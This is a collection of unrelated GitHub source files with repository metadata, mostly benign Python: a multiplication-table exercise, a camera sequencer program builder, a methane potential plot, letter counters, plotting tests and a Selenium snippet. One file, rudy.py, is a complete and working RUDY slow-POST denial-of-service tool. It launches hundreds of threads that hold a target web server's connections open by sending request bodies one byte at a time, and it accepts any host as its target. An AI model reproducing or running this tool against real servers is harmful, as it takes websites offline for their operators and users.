p2 = p-b*5
if p2 == 0:
summa += 1
b -= 1
else:
b -= 1
if p2 > 0:
summa += 1+p2//2
else:
b = b2
print(summa) | [
"sergey.trof@rambler.ru"
] | sergey.trof@rambler.ru |
cccdf7bf02ce1fe0653afcbb0717a261450c2508 | ac0407195ea50e94731e413ba79faf3a4ad302a4 | /cadena-garcia-jesus-angel/5parte.py | e1e98332432ae357a177b46a2909202d1b494538 | [] | no_license | Yaevine/Python_practice_AOFI_1718 | e72539d048df20c87b9393068139bb133cb5d616 | e779a0f5183a2bd411cf27eb35148837292be80e | refs/heads/master | 2020-03-08T09:42:47.243264 | 2018-04-20T13:40:10 | 2018-04-20T13:40:10 | 128,053,639 | 0 | 0 | null | 2018-04-04T11:38:22 | 2018-04-04T11:38:21 | null | UTF-8 | Python | false | false | 618 | py | import time
#Primero fijamos las variables y le damos valores
numerotabla =0
numerocambiante=0
resultado = numerotabla * numerocambiante
menu = "si"
#Ahora solicitamos el numero que quiere multiplicar el usuario
while menu=="si":
numerotabla = int(input("Dime que tabla de multiplicar quieres saber del 0 al 10\n"))
for numerocambiante in range (11):
resultado = numerotabla * numerocambiante
print (numerotabla, "por", numerocambiante, "=",resultado)
time.sleep(0.5)
menu = input("¿Quieres saber otra tabla de múltiplicar? ( si/no)\n")
if menu!= "si":
print("Nos vemos cuando quieras aprender más :D")
| [
"Yaevine@gmail.com"
] | Yaevine@gmail.com |
bccb0b570fccfc2911fac4309cd83476c3f3e223 | 916787ad51d5847f207fff9405768e6182daeb32 | /AndesControllerLib/bkp/0/sequencer.py | c72e52852d4874d5faf79044031772829228c860 | [] | no_license | NoelGaspar/usb_code | 27dfb0a47bc6e80cd3b97c1501b958d2072028e7 | 3315b5e318877cf8accba2205615ca220dd609da | refs/heads/master | 2021-09-08T05:35:19.647600 | 2018-03-07T17:41:41 | 2018-03-07T17:41:41 | 111,578,363 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,361 | py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
## @package sequencer
#
# Generation SciCam's sequencer programs.
#
# This module exposes the ProgramBuilder class to generate SciCam sequencer programs.
import log as log;
import six as six;
## An already compiled SciCam sequencer program.
# @note For read-only use. To build programs use ProgramBuilder
class Program:
## Initializes a compiled program.
# @note Do not call direclty, use ProgramBuilder instead.
#
# @param self An instance of Program
# @param codes ([int...]) Binary value of the memory to be written at each index.
# @param mode_addresses ({str:int...}) Cache of the program's modes location.
# @param modes ([sequencer.Mode]) Source modes of the program compiled in codes.
# @param log (log._Log) The logging context
def __init__(self, codes, mode_addresses, modes, log=log.get_default_context()):
self.codes = codes;
self.address_map = mode_addresses;
self.modes = modes;
self.log = log;
## Get the location in memory of a mode
#
# @param self An instance of Program
# @param mode (str) Name of the mode.
#
# @returns The address (int) of the mode.
def get_address(self, mode):
return self.address_map[mode];
## Retruns a string of the program contents.
#
# If labels is provided, state pin names are included.
#
# @param self An instance of Program
# @param labels ({str:int}) Name of the sequencer pins.
#
# @returns A human-readable string representation of the program.
def as_str(self, labels = None):
result = [];
for c in self.codes:
if((c >> 63) == 1):
result.append(Mode.format_code(c, self.address_map));
else:
result.append(State.format_code(c, labels));
return '\n'.join(result);
## Gets all the defined mode names in the program.
#
# @returns A list of all the mode names (str) in the program.
def mode_names(self):
return [m.name for m in self.modes];
## Gets the mode with the specified name.
#
# @param self An instance of Program
# @param name (str) The name of the mode
#
# @returns A mode with the specified name.
def get_mode(self, name):
for mode in self.modes:
if(name == mode.name):
return mode;
raise ValueError('Mode with name '' + str(name) + '' not found in program.');
## Alias for self.as_str(None)
#
# @see as_str
#
# @param self An instance of Program
#
# @returns A human-readable string representation of the program.
def __str__(self):
return self.as_str();
## Plots the program modes.
#
# If a start mode is specified, the plot will simulate a program run.
#
# @note: Requires matplotlib to be installed.
#
# @param self An instance of Program
# @param pin_labels ({str:int...}/sequencer.Labels) A mapping between pin names and addresses.
# @param start_mode (str) The mode in which to start the simulation.
# @param max_cycles (int) Maximum length of the simulation.
#
# @returns A matplotlib handler.
def plot(self, pin_labels = None, start_mode = None, max_cycles = 100000):
import matplotlib.pyplot as plots;
import matplotlib.patches as patches;
import matplotlib.lines as lines;
# Determine which modes to plot
plot_modes = self.modes;
if(start_mode is not None):
tot_time = 0;
nested_count = 0;
plot_modes = [];
next_mode = self.get_mode(start_mode);
while(tot_time < max_cycles):
current_mode = next_mode;
next_mode = self.get_mode(current_mode.next_mode_name);
mode_time = 0;
mode_multiplier = current_mode.n_loops;
for state in current_mode.states:
mode_time += state.hold_time;
if(current_mode.n_loops <= 0):
plot_modes.append(current_mode);
break;
else:
if(current_mode.is_nested()):
if(nested_count < current_mode.nested_loops):
nested_count += 1;
mode_multiplier = 1;
next_mode = self.get_mode(current_mode.parent_mode_name);
else:
mode_multiplier = 0;
nested_count = 0;
plot_modes.extend([current_mode]*mode_multiplier);
tot_time += mode_time * mode_multiplier;
# Plot modes
fig = plots.figure();
axes = fig.add_subplot(111, aspect='equal');
current_time = 0;
parity = False;
plot_values = {};
for mode in plot_modes:
current_duration = 0;
to_plot = mode._expand_states(pin_labels);
for k in to_plot.keys():
current_duration = max(current_duration, len(to_plot[k]));
if(k not in plot_values):
plot_values[k] = (len(plot_values), [], []);
if(parity):
pos_y = 0;
size_y = len(plot_values.keys());
pos_x = current_time;
size_x = current_duration;
bg = patches.Rectangle((pos_x, pos_y), size_x, size_y, alpha=0.1, facecolor='#000000', edgecolor=None, fill=True);
axes.add_patch(bg);
parity = not parity;
axes.text(current_time + current_duration/2, len(plot_values.keys()) + 1, mode.name,
horizontalalignment='center',
verticalalignment='top');
for k in to_plot.keys():
axes.text(-0.1 + current_time, plot_values[k][0] + 0.5, k, horizontalalignment='right', verticalalignment='center');
values = [v*0.9 + plot_values[k][0] for v in to_plot[k]];
plot_values[k][1].extend(six.moves.range(current_time, current_time + current_duration));
plot_values[k][2].extend(values);
current_time += current_duration;
self.log.info('Optimizing plots... ', 2);
for pin in plot_values.keys():
x_values = plot_values[pin][1];
y_values = plot_values[pin][2];
if(len(y_values) > 1):
preserve = [0] + [ii+1 for ii in range(len(y_values) - 2) if y_values[ii] != y_values[ii+1] or y_values[ii+1] != y_values[ii+2]] + [len(y_values) -1];
x_values = [x_values[ii] for ii in preserve];
y_values = [y_values[ii] for ii in preserve];
plots.step(x_values, y_values);
self.log.info('Done.', 2);
axes.axis('auto');
plots.tick_params(
axis='y',
which='both',
bottom='off',
top='off',
labelbottom='off',
labeltop='off');
return fig;
## @var codes
# ([int...]) Binary value of the memory to be written at each index.
## @var address_map
# ({str:int...}) Cache of the program's modes location.
## @var modes
# ([sequencer.Mode]) Source modes of the program compiled in codes.
## @var log
# (log._Log) The logging context
## A class to build SciCam secuencer programs.
class ProgramBuilder:
## Initializes a ProgramBuilder
#
# @param self An instance of ProgramBuilder
# @param log The logging context.
def __init__(self, log = log.get_default_context()):
self.modes = [];
self.log = log;
## Adds a mode to the current program
#
# Will raise error if another mode with equal name has been registered.
#
# @param self An instance of ProgramBuilder
# @param mode (sequencer.Mode) The mode to add.
def add_mode(self, mode):
name = mode.name;
if(name in self.mode_names()):
raise ValueError('There is already a mode named ' + str(name));
self.modes.append(mode);
## Gets all the mode names in the program so far.
#
# @param self An instance of ProgramBuilder
#
# @returns A list of all the mode names (str) in the program.
def mode_names(self):
return [m.name for m in self.modes];
## Get a mode with a specifid name.
#
# @param self An instance of ProgramBuilder
# @param name (str) The name of the mode.
#
# @returns The mode (sequencer.Mode) with the specified name.
def get_mode(self, name):
for m in self.modes:
if m.name == name:
return m;
raise ValueError('There is no mode named: ' + str(name));
## Creates a SciCam sequencer program.
#
# @param self An instance of ProgramBuilder
# @param log (log._Log) The log context to give to the new Program.
#
# @returns A compiled program (sequencer.Program).
def build(self, log=None):
if(log is None):
log = self.log;
address_cache = {};
current_address = 0;
for mode in self.modes:
address_cache[mode.name] = current_address;
current_address += len(mode.states) + 1;
# Consistency checks
error = False;
for mode in self.modes:
try:
self.get_mode(mode.next_mode_name);
except:
error = True;
self.log.error('Next mode '' + str(mode.next_mode_name) + '' for mode ' + str(mode.name) + ' does not exist.');
if(mode.is_nested()):
try:
parent = self.get_mode(mode.parent_mode_name);
if(parent.is_nested()):
self.log.warning('Double nested modes detected: ' + str(mode.name) + ' in ' + str(parent.name) + ' in ' + str(mode.parent_mode_name) + '.');
except:
error = True;
self.log.error('Parent mode '' + str(mode.parent_mode_name) + '' for mode ' + str(mode.name) + ' does not exist.');
if(error):
raise ValueError('Compilation stop because of consistency errors. Check log.');
codes = [];
for mode in self.modes:
codes.append(mode.get_code(self, address_cache));
for state in mode.states:
codes.append(state.get_code());
return Program(codes, address_cache, self.modes, log);
## @var modes
# ([sequencer.Mode...]): List of registered modes.
## @var log
# (log._Log): The logging context.
## A sequencer mode.
#
class Mode:
## Default value of a mode address
_invalid_mode = 2**10 -1;
## Maximum value n_loops can have
_max_n_loops = 2**16 - 1;
## Maximum value n_loops_nested can have
_max_n_loops_nested = 2**16 - 1;
## Maximum number of states the mode can have
_max_n_states = 2**10 - 1;
## Initializes a Mode.
#
# @param self An instance of Mode
# @param name (str) The name of the mode.
# @param n_loops (int) The number of times this mode runs before jumping to the next mode (0 = infinite).
# @param next_mode_name (str) The name of the mode to jump after this mode finishes.
# @param parent_mode_name (str) The name of the parent mode of this mode (if this mode is nested).
# @param nested_loops (int) The number of times to jump to the parent mode before jumping to the next mode.
def __init__(self, name, n_loops, next_mode_name = None, parent_mode_name = None, nested_loops = None):
self.name = name;
if(n_loops > self._max_n_loops):
raise ValueError('n_loops (' + str(n_loops) + ') is out of range [0...' + str(self._max_n_loops) + '].');
self.n_loops = n_loops;
self.next_mode_name = next_mode_name;
if(parent_mode_name):
self.parent_mode_name = parent_mode_name;
if(not nested_loops):
raise ValueError('Must give a value to nested_loops if parent_mode_name is specified.');
if(nested_loops > self._max_n_loops_nested):
raise ValueError('nested_loops (' + str(nested_loops) + ') is out of range [0...' + str(self._max_n_loops_nested) + '].');
self.nested_loops = nested_loops;
self.states = [];
## Gets the time evolution of the modes states.
#
# Useful for plotting. If pin_labels is provided, names instead of addresses will be keys of to pin states.
#
# @param self An instance of Mode
# @param pin_labels ({str:int...}/sequencer.Labels) A mapping between pin names and addresses.
#
# @returns A dict {str:[int...]} containing the time evolution of each pin.
def _expand_states(self, pin_labels = None):
pin_dir = pin_labels;
if(pin_dir is None):
pin_dir = {};
for ii in range(32):
pin_dir[str(ii)] = ii;
result = {};
for k in pin_dir.keys():
result[k] = [];
for state in self.states:
for k in pin_dir.keys():
pin_value = state.get_value_of_address(pin_dir[k]);
result[k].extend([pin_value]*state.hold_time);
return result;
## Appends a state to the end of the mode
#
# @param self An instance of Mode
# @param state (sequencer.state) The state to add.
def add_state(self, state):
if(len(self.states) >= self._max_n_states):
raise ValueError('Number of states per mode limit (' + str(self._max_n_states) + ') reached.');
self.states.append(state);
## Appends many states to the end of the mode
#
# @param self An instance of Mode
# @param states (iter of sequencer.state) An iterable containing states.
def add_states(self, states):
for state in states:
self.add_state(state);
## Get whenever this node has a parent.
#
# @returns True if has a parent, False otherwise.
def is_nested(self):
return hasattr(self, 'parent_mode_name');
## Get the binary data associated with this mode.
#
# @param self An instance of Mode
# @param builder (sequencer.ProgramBuilder) The ProgramBuilder requesting the code.
# @param address_cache ({str:int...}) The cache of the mode's addresses.
#
# @returns The binary code (int) representing this mode.
def get_code(self, builder, address_cache):
is_nested = 0;
nested_loops = 0;
if(self.is_nested()):
is_nested = 1;
nested_loops = self.nested_loops;
mode_address = address_cache[self.name];
next_address = self._invalid_mode;
if(self.next_mode_name):
next_address = address_cache[self.next_mode_name];
parent_address = self._invalid_mode;
if(self.is_nested()):
parent_address = address_cache[self.parent_mode_name];
code = 0;
code = code | nested_loops;
code = code | (parent_address << 16);
code = code | (next_address << 26);
code = code | (is_nested << 36);
code = code | (self.n_loops << 37);
code = code | (len(self.states) << 53);
code = code | (1 << 63);
return code;
@classmethod
## Create a human-redable representation of a mode's code
#
# If addresses is provided, modes names will be shown to parent and next modes.
#
# @note This is a class method.
#
# @param cls An instance of Mode class
# @param code (int) The code to represent
# @param addresses ({str:int...}) The cache of the mode's addresses.
def format_code(cls, code, addresses = None):
nested_loops = code & 0xFFFF;
parent_address = (code >> 16) & 0x3FF;
next_address = (code >> 26) & 0x3FF;
is_nested = (code >> 36) & 1;
n_loops = (code >> 37) & 0xFFFF;
n_states = (code >> 53) & 0x3FF;
def conform_str(string, length):
return ' '*max(0, (length - len(string))) + string;
min_str_len = 3;
if(addresses):
min_str_len_label = min_str_len;
for k in addresses.keys():
min_str_len_label = max(min_str_len_label, len(k));
next_label = '<unknown>';
parent_label = '<unknown>';
for k in addresses.keys():
if(addresses[k] == parent_address):
parent_label = k;
if(addresses[k] == next_address):
next_label = k;
data = [1, n_states, n_loops, is_nested, next_label, parent_label, nested_loops];
data_str = [conform_str(str(s), min_str_len) for s in data];
data_str[4] = conform_str(data_str[4], min_str_len_label);
data_str[5] = conform_str(data_str[5], min_str_len_label);
else:
data = [1, n_states, n_loops, is_nested, next_address, parent_address, nested_loops];
data_str = [conform_str(str(s), min_str_len) for s in data];
return ' '.join(data_str);
## @var name (str)
# The name (str) of the mode.
## @var n_loops
# (int) The number of times this mode runs before jumping to the next mode (0 = infinite).
## @var next_mode_name
# (str) The name of the mode to jump after this mode finishes.
## @var parent_mode_name
# (str) The name of the parent mode of this mode (if this mode is nested).
## @var nested_loops
# (int) The number of times to jump to the parent mode before jumping to the next mode.
## @var states
# ([sequencer.State...]) The states of this mode.
## A sequencer state.
# Contains information of it pin output values and how much time does it have to hold them.
class State:
# Maximum value for hold_time.
_max_hold_time = 2**24 - 1;
## Initializes a State.
#
# @param self An instance of State
# @param data (int) The value of each pin (in binary) of this mode.
# @param hold_time (int) The number of cycles this state holds the data.
def __init__(self, data, hold_time):
self.data = data;
if(hold_time < 0 or hold_time > self._max_hold_time):
raise ValueError('hold_time (' + str(hold_time) + ') is out of range [0...' + str(self._max_hold_time) + '].');
self.hold_time = hold_time;
## Gets the value of a pin of the state.
#
# @param self An instance of State
# @param address (int) The address of the pin.
#
# @returns The value of the pin (int). Either 1 or 0.
def get_value_of_address(self, address):
return (self.data >> address) & 0x01;
@classmethod
## Creates a state from a list of each bit value.
#
# @note This is a class method.
#
# @param cls An instance of Mode class
# @param data_bits ([str/int/bool...]) The value of each pin (in binary) of this mode.
# @param hold_time (int) The number of cycles this state holds the data.
#
# @returns A State
def from_bits(cls, data_bits, hold_time):
bits = [int(bool(bit)) for bit in data_bits];
if(len(bits) > 32):
raise ValueError('Too many bits (' + str(len(bits)) + ' for a sequencer state.');
if(len(bits) < 32):
self.log.warning('There are less bits than expected in state (' + str(len(bits) ) + '), will fill MSBs with 0s.');
data = 0;
for ii in range(len(bits)):
data = data | (bits[ii] << ii);
return State(data, hold_time);
@classmethod
## Creates a state from a dictionary of each bit value.
#
# @note This is a class method.
#
# @param cls An instance of Mode class
# @param labels ({str:int...}) The address of each pin name.
# @param named_bits ({str:int/str...}) The value of each pin name.
# @param hold_time (int): The number of cycles this state holds the data.
#
# @returns A State
def from_labels(cls, labels, named_bits, hold_time):
bits = [0]*32;
for k in named_bits.keys():
bits[labels[k]] = named_bits[k];
return cls.from_bits(bits, hold_time);
@classmethod
## Creates multiple states from a dictionary.
#
# The dictionary `named_bits` has to contains names of each pin name associated.
# with a tuple containing the values of multiple states. The length of each tuple must
# match `len(hold_times)`.
#
# @note This is a class method.
#
# @param cls An instance of Mode class
# @param labels ({str:int...}) The address of each pin name.
# @param named_bits ({str:iter(int/str)...}): The values of each pin name.
# @param hold_times (tuple(int)): The number of cycles this state holds the data for each state.
#
# @returns A tuple containing States
def from_labels_array(cls, labels, named_bits, hold_times):
length = len(hold_times);
for k in named_bits.keys():
if(len(named_bits[k]) != length):
raise ValueError('Length of label ' + str(k) + ' (' + str(len(named_bits[k])) + ') does not match length of hold_times (' + str(length) + ').');
result = [];
for ii in range(length):
result.append(cls.from_labels(labels, {k:named_bits[k][ii] for k in named_bits.keys()}, hold_times[ii]));
return tuple(result);
@classmethod
## Create a human-redable representation of a state's code
#
# If labels is provided, pin names will be shown instead of addresses.
#
# @note This is a class method.
#
# @param cls An instance of Mode class
# @param code (int) The code to represent
# @param labels ({str:int...}) The name of each pin.
#
# @returns A human-readable representation (str) of a state's code
def format_code(cls, code, labels = None):
data = (code & 0x7FFFFFFF80000000) >> 31;
time = (code & 0x7FFFFF80) >> 7;
data_array = ['']*32;
for ii in range(32):
data_array[ii] = (data >> ii) & 1;
if(labels is None):
data_array[ii] = str(data_array[ii]);
else:
label = None;
for k in labels.keys():
if(labels[k] == ii):
label = str(k);
break;
if(label != None):
data_array[ii] = str(label) + ':' + str(data_array[ii]) + '\n';
else:
data_array[ii] = None;
if(labels):
data_array = ['---- hold for: ' + str(time) + ' ----- \n'] + [d for d in data_array if d];
else:
data_array = data_array + [', hold for: ' + str(time)];
return ' '.join(data_array);
## Returns the code associated with this state
#
# @param self An instance of Mode
#
# @returns The code (int) associated with this state
def get_code(self):
return (self.data << 31) | (self.hold_time << 7);
## @var data
# (int) The value of each pin (in binary) of this mode.
## @var hold_time
# (int) The number of cycles this state holds the data.
## Labels of the pins of the sequencer
# This class is basically a dict with a method to reverse it and
# repeated address-checking.
class Labels:
## Initialize a sequencer labels
#
# @param self An instance of Labels
# @param labels ({str:int...}): The address of each pin name.
def __init__(self, labels):
seen_values = [];
repeated_keys = [];
for k in labels.keys():
v = labels[k];
if(v in seen_values):
repeated_keys.append(k);
else:
seen_values.append(v);
if(len(repeated_keys) > 0):
repeated_strs = [str(k) + ':' + str(labels[k]) for k in repeated_keys];
raise ValueError('There are repeated indexes for labels: ' + ','.join(repeated_strs));
self.labels = labels;
## Gets the address associated with a name
#
# @param self An instance of Labels
# @param label (str) The name of the pin
#
# @returns The address (int) associated with the name
def __getitem__(self, label):
return self.labels[label];
## Gets the name associated with an address
#
# @param self An instance of Labels
# @param address (int) The address of the pin
#
# @returns The label (str) associated with the address
def label_of(self, address):
for k in self.labels.keys():
if(address == self.labels[k]):
return k;
raise ValueError('There is no label for address ' + str(address));
## @var labels
# ({str:int...}): The address of each pin name.
| [
"noreply@github.com"
] | noreply@github.com |
ad9560f4940ff21422b1436bccf90c34493fc577 | f2a4d90226fb45c9388ae7b0f4b30e7bf50f86e0 | /week2/Python Files/assignment_2_q5_equipot_surf.py | 46ac6754f17b96b70dc6d75aa9d23722a62ede58 | [] | no_license | Souritra-Garai/SRFP2020 | f38dd703029feede14168f31a25875b57be186ee | c8d65cf4c8213fa64af47af11b544f8ae1347fb7 | refs/heads/master | 2022-09-04T03:05:55.061846 | 2020-05-24T12:23:44 | 2020-05-24T12:23:44 | 264,501,097 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,349 | py | from electric_multipoles import ChargeDistribution, e, Dipole
from math import asin, pi
from mayavi.mlab import contour3d
from ai.cs import sp2cart
import numpy as np
# Radius of Carbon atom
r_C = 70e-12 # m
# Radius of Hydrogen atom
r_H = 53e-12 # m
# Carbon - Hydrogen Bond Length
BL_CH = 160e-12 # m
r_min, r_max = -BL_CH*2, BL_CH*2
# Tetrahedral angle (109.4 deg) - 90 deg
tet_theta = - asin(1/3)
# Charge Districution for C atom
C_chargeArray = [4*e] + [-e]*4
C_chargePosArray = np.array( sp2cart([0] + [r_C]*4, [0, pi/2] + [tet_theta] * 3, [0, 0, -pi/3, pi/3, pi]) ).transpose()
C_ChargeDist = ChargeDistribution(C_chargeArray, C_chargePosArray)
# Array of positions of H atoms
H_PosArray = np.array( sp2cart( [BL_CH]*4 , [pi/2] + [tet_theta] * 3, [0, -pi/3, pi/3, pi] ) ).transpose()
# Array of positions of electron of H atom
# assuming them to be farther away from the C atom
H_e_PosArray = np.array( sp2cart( [BL_CH + r_H]*4 , [pi/2] + [tet_theta] * 3, [0, -pi/3, pi/3, pi] ) ).transpose()
# H atom Dipoles
H1 = Dipole.fromChargeDistro(ChargeDistribution([e, -e], [ H_PosArray[0], H_e_PosArray[0]]))
H2 = Dipole.fromChargeDistro(ChargeDistribution([e, -e], [ H_PosArray[1], H_e_PosArray[1]]))
H3 = Dipole.fromChargeDistro(ChargeDistribution([e, -e], [ H_PosArray[2], H_e_PosArray[2]]))
H4 = Dipole.fromChargeDistro(ChargeDistribution([e, -e], [ H_PosArray[3], H_e_PosArray[3]]))
n_points = 20
x_array = np.linspace(r_min, r_max, n_points)
y_array = np.linspace(r_min, r_max, n_points)
z_array = np.linspace(r_min, r_max, n_points)
V_Tensor = np.zeros((n_points, n_points, n_points))
print('Started calculating V_Tensor')
for i in range(n_points) :
x = x_array[i]
for j in range(n_points) :
y = y_array[j]
for k in range(n_points) :
z = z_array[k]
pos = np.array([x, y, z])
V_Tensor[i][j][k] = C_ChargeDist.V(pos) + H1.V(pos) + H2.V(pos) + H3.V(pos) + H4.V(pos)
print('Finished calculating V_Tensor')
X, Y, Z = np.meshgrid( x_array, y_array, z_array, indexing='ij')
V_Tensor[ np.isinf(V_Tensor) ] = np.nan
contour3d( X, Y, Z, V_Tensor,
name='Equipotential surfaces for Methane Molecule',
contours=50, opacity=0.5, colormap='magma')
waitkey = input() | [
"noreply@github.com"
] | noreply@github.com |
ba9c25204d3852857589bdd57184944ae6d9be2d | e6136dafd25e405300755c37e6d74fd7856e272c | /Lab2/Lab2.py | 3948fbe9cf353495ddb6c4b770dce5742e6e95a8 | [] | no_license | MatthiasMarczyszyn/Systemy_Wbudowane | 16c8bd1e37e2d2c78209d46bc61642951b6eff3a | c00f8887c746b8178461fc23a7ecf8eb0222099c | refs/heads/main | 2023-05-29T12:30:56.234265 | 2021-05-31T19:26:09 | 2021-05-31T19:26:09 | 364,918,917 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,328 | py |
def char_counter_string(string_name: str) -> dict:
"""A simple function that counts how many letters are in the word
Parameters
----------
string_name : str
A word in witch we want to counts the letters
Returns
-------
dict
A dictionery with letters as keys and the number of ech letter as values
Example
-------
>>> char_counter_string("ala")
{'a' : 2, 'l' : 1}
"""
# remove all non letter chars from out string
string_name = "".join(c for c in string_name if c.isalpha())
# create a empty dictionary
char_dict = {}
# counting and writing each number in string to dictionary
for char in string_name.lower():
if char in char_dict.keys():
char_dict[char] = char_dict[char] + 1
else:
char_dict[char] = 1
return char_dict
def char_counter_file(file_name: str) -> dict:
"""A simple function thant read a text file into string sho itw and counts letters in this file
Parameters
----------
file_name : str
A name of chosen file
Returns
-------
dict
A dictionary with letters as keys and the number of ech letter as values
Example
-------
>>> char_counter_file("Text.tx")
ala fasfsafa
;;;fsdgdhdf
dasfas[][]
{'a': 7, 'l': 1, 'f': 6, 's': 5, 'd': 4, 'g': 1, 'h': 1}
"""
#opening and save data from file to string
with open(file_name) as f:
file_content = f.read()
#printing data from file
print(file_content)
#using char_counter_string to count letters in file
return char_counter_string(file_content)
def list_min_value(number_list: list) -> dict:
"""A simple function that detect the smallest value inth list and show her all idexes
Parameters
----------
number_list : list
List of numbers
Returns
-------
dict
Dictionary with smallest value and it idexes
>>> list_min_value([1,2,3,4,1,2,4,23,1])
{'Minimal Values' : 1, 'Indexes' : [0,4,8]}
"""
#search the minmum in list
min_value = min(number_list)
#create a list of all indexes witch include minimum
index_list = [each for each in range(len(number_list)) if number_list[each] == min_value]
return {"Minimal Value:": min_value, "Indexes": index_list}
| [
"m.marczyszyn@gmail.com"
] | m.marczyszyn@gmail.com |
d8801d1e2ae3d8f288580bc5fd359f92de04d2f9 | 9e06bffb84fc0c9fe7f739d444ba76aeb2a3365f | /While-Loop - Lab/05. Max Number.py | 10af5606cca935f2dfb33a4f91e4d19646122923 | [] | no_license | AngelValAngelov/Python-Basics | c40c6a1d1ba64a91ca52fa06e8ffb1c612e79d49 | 4dd153b8da0c105eafabf50a6fae206390f4ce72 | refs/heads/main | 2023-05-04T17:58:37.370237 | 2021-05-29T20:49:13 | 2021-05-29T20:49:13 | 342,964,325 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 191 | py | import sys
n = int(input())
max_number = -sys.maxsize
while n > 0:
number = int(input())
if number > max_number:
max_number = number
n -= 1
print(max_number) | [
"noreply@github.com"
] | noreply@github.com |
ba35f6195d26265971096fb556edf8ec094e9269 | 25287f4c89a6335758f08bb8b201d53742b7de61 | /rudy.py | f410777402c0483516b717dc2c853a7db5ed1613 | [] | no_license | htll/RUDY | a8bbdc498a508189c497972b2f641427a66860c8 | bb0f7647d14dcd719ef508830edd5280a5171c1e | refs/heads/master | 2020-07-01T22:05:07.572047 | 2016-11-20T04:50:21 | 2016-11-20T04:50:21 | 74,252,432 | 2 | 1 | null | 2016-11-20T04:19:24 | 2016-11-20T04:19:24 | null | UTF-8 | Python | false | false | 2,625 | py | #!/usr/bin/env python3
# Copyright Nicolas Pielawski 2016
# Edited by aiglebleu for hightechlowlife.eu
import argparse, threading, socket, time, os
website_post_running = True
def website_post(host, port = 80, length = 1024, time_wait = 1, thread_mode = False):
request = 'POST / HTTP/1.1\r\nHost: {}\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: {}\r\n\r\n'.format(host, length).encode('ascii')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((host, port))
except:
print("LOL! The server cannot handle more connection... xD")
return
sock.send(request)
for i in range(length):
if not website_post_running and thread_mode:
return
try:
sock.send(b' ')
except:
sock.close()
website_post(host, port, length, time_wait)
time.sleep(time_wait)
sock.close()
website_post(host, port, length, time_wait)
def rudy_attack(host, port = 80, length = 1024, time_wait = 1, thread_nbr = 512):
global website_post_running
website_post_running = True
thread_pool = []
for i in range(thread_nbr):
thread_pool.append(threading.Thread(None, website_post, None, (host, port, length, time_wait, True)))
thread_pool[i].start()
print("{} threads started to attack {}:{}!\r".format(i+1, host, port))
print()
print('Processing RUDY attack, now!')
print('Press enter key to stop the attack...')
input()
print("Closing...")
website_post_running = False
for thr in thread_pool:
thr.join()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Processes the RUDY attack on an arbitrary target.',
epilog='And that\'s how you burst a server with no zombies ;)')
parser.add_argument('server', help='Hostname or ip of the target to focus')
parser.add_argument('-p', '--port', metavar='port', type=int, default=80, help='Port of the target to focus')
parser.add_argument('-l', '--length', metavar='packet_len', type=int, default=1024, help='Length of the TCP Packet (without HTTP header)')
parser.add_argument('-t', '--time', metavar='packet_time', default=1, help='Amount of time to wait between two TCP packets send.')
parser.add_argument('-n', '--thread', metavar='count', default=512, help='Amount of clients that are going to contact the server.')
args = parser.parse_args()
rudy_attack(args.server, int(args.port), int(args.length), int(args.time), int(args.thread))
| [
"aiglebleu@openmailbox.org"
] | aiglebleu@openmailbox.org |
99c24d8908cc8d2ec3cec6a30bd5b6c931f9ffb9 | 56b81a46107acebb24be67368b4fb17d440f423a | /JPlot/examples/plotTest.py | 02f0e15f19ca0af3d22b18f8952c9993adf659ba | [
"Apache-2.0",
"MIT"
] | permissive | Thesys-lab/InMemoryCachingWorkloadAnalysis | 451dec27eb7fbb9bdf4bd1258e3c0690f029464e | 5f6f9f7e29a164478f3fc28eb64c170bbbafdec7 | refs/heads/master | 2023-01-04T09:55:32.459308 | 2020-09-30T15:50:21 | 2020-09-30T15:50:21 | 291,110,974 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,572 | py |
import JPlot.pyplot as plt
from matplotlib.ticker import MaxNLocator
from matplotlib.lines import Line2D
from matplotlib.patches import Patch
import numpy as np
import os
import sys
sys.path.append("../")
def test_plot1():
for i in range(8):
plt.plot(range(20), [j+i*8 for j in range(20)])
plt.savefig("test.png", save_tex=True)
plt.clf()
def test_replot():
plt.replot_using_saved_data("test.png.plotData.json")
def test_subplots():
fig, axes = plt.subplots(1, 2, figsize=(10, 4),
gridspec_kw={"wspace": 0, "hspace": 0},
subplot_kw={"sharey": True, "frame_on": True}
)
d = np.arange(0, 20)
axes[0].plot(d, d, )
axes[0].fill_between(y1=d, x=d, alpha=0.2)
d2 = np.arange(20, 0, -1)
axes[1].plot(d2, d2, )
axes[1].fill_between(y1=d2, x=d2, alpha=0.2)
axes[1].set_yticks([])
legend_elements = [Line2D([0], [0], color='red', lw=2, ls='-', label='la'),
Line2D([0], [0], color='green',
lw=2.5, ls='--', label='lb'),
Patch(facecolor='black', edgecolor='gray', label='pa', alpha=0.3)]
plt.legend(handles=legend_elements, frameon=True, facecolor="white", edgecolor="black", framealpha=1,
labelspacing=0.2, columnspacing=0.6, bbox_to_anchor=(0.2, 1), ncol=2)
fig.tight_layout()
plt.savefig("test", pad_inches=0, bbox_inches='tight')
if __name__ == "__main__":
test_plot1()
# test_replot()
# test_subplots()
| [
"Peter.WayneChina@gmail.com"
] | Peter.WayneChina@gmail.com |
9fea5106d554cca986c502b31ddb9178c8d34eb1 | 700028cf9125be3aa961c9ad48d0f69afe77ab06 | /4.selenium/step03mypagesearch.py | 1e753392cf9e5d485c8cc16e6493f916157817cb | [] | no_license | Yukyeong-Lee/Crawling | 6d33b5b2e86d2018fb9985e02c776cb5cdcfe1a0 | 50d223d697ace8fcc79ff0604782e8e22f26543a | refs/heads/master | 2023-06-11T20:55:13.318938 | 2021-07-07T02:34:00 | 2021-07-07T02:34:00 | 383,651,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,239 | py |
from selenium import webdriver
import time
driver = webdriver.Chrome("c:/driver/chromedriver.exe")
driver.get("http://127.0.0.1:5500/4.selenium/step03mypage.html")
time.sleep(3)
# input tag
search_box = driver.find_element_by_name('data')
# button tag
btn = driver.execute_script("searchBarModuleClickForSearch()")
# input 에 입력
search_box.send_keys('encore22')
